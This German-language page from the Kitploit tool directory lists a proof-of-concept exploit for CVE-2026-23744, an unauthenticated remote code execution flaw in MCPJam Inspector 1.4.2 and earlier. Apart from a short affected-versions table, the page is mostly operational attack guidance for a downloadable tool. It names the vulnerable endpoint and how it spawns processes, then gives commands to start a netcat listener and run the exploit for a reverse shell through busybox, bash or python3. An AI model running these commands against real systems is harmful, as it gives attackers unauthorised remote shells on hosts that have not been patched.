Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — Proof-of-Concept-Exploit für eine nicht authentifizierte Schwachstelle zur Remotecodeausführung in MCPJam Inspector <= 1.4.2. | Kitploit
Tools/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — Proof-of-Concept-Exploit für eine nicht authentifizierte Schwachstelle zur Remotecodeausführung in MCPJam Inspector <= 1.4.2.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2vor 3 MonatenNoch nicht geprüft
Teilen

CVE-2026-23744 — MCPJam Inspector Unauthentifizierter RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 bindet standardmäßig an 0.0.0.0 und gibt /api/mcp/connect ohne Authentifizierung frei. Der Endpunkt akzeptiert ein serverConfig-Objekt, das direkt einen Prozess auf dem Host startet – die Übergabe eines Reverse-Shell-Payloads ermöglicht sofortige RCE ohne erforderliche Anmeldedaten.


Voraussetzungen

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
FlagBeschreibungStandard
-uZiel-URLerforderlich
-iIhre Listener-IP (LHOST)erforderlich
-pIhr Listener-Port (LPORT)erforderlich
-mPayload-Methode: busybox, bash, python3busybox

Beispiel Reverse Shell

Schritt 1 — Listener starten:

root@kitploit:~
nc -lvnp 4444

Schritt 2 — Exploit ausführen:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Payload-Methoden

Falls busybox auf dem Ziel nicht funktioniert, versuchen Sie die anderen Methoden:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Betroffene Versionen

SoftwareVerwundbarBehoben
MCPJam Inspector<= 1.4.21.4.3

Referenzen

  • CrowdSec CVE-Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Tool herunterladen